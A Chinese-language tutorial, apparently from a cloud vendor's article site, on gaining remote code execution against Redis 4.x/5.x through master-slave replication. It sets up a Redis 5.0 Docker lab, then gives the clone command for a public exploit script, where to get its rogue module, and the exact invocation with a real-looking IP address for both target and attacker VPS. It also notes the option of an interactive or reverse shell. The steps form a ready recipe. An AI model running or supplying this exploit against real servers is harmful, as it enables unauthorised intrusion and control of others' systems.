温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Redis基于主从复制的RCE 4.x/5.x怎么实现

发布时间:2022-01-15 15:36:42 来源:亿速云 阅读:125 作者:iii 栏目:大数据

这篇文章主要讲解了“Redis基于主从复制的RCE 4.x/5.x怎么实现”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“Redis基于主从复制的RCE 4.x/5.x怎么实现”吧!

首先拉取一个5.0镜像

docker search redis5.0    //查找镜像docker pull damonevking/redis5.0   //拉取下图第三个镜像

Redis基于主从复制的RCE 4.x/5.x怎么实现

0x02 运行环境

运行容器

docker run -p 6379:6379 -d damonevking/redis5.0 redis-server   //映射端口并运行容器

访问你的ip+6379端口,如下图则说明搭建成功

Redis基于主从复制的RCE 4.x/5.x怎么实现

0x03 漏洞利用

git clone https://github.com/Ridter/redis-rce.git   //下载漏洞利用脚本

注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下,然后执行如下命令:

python3 redis-rce.py -r 136.244.70.243(目标ip) -L 136.244.70.243(自己的vps) -f exp.so   //ip就不打码了,师傅们不要搞我

需要注意,这里的-r后面是目标的ip,而-L后面则是你执行脚本的vps的ip

Redis基于主从复制的RCE 4.x/5.x怎么实现

在此处:i为交互式shell,r为反弹shell,根据自己的需要选择就可以了

Redis基于主从复制的RCE 4.x/5.x怎么实现

感谢各位的阅读,以上就是“Redis基于主从复制的RCE 4.x/5.x怎么实现”的内容了,经过本文的学习后,相信大家对Redis基于主从复制的RCE 4.x/5.x怎么实现这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是亿速云,小编将为大家推送更多相关知识点的文章,欢迎关注!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI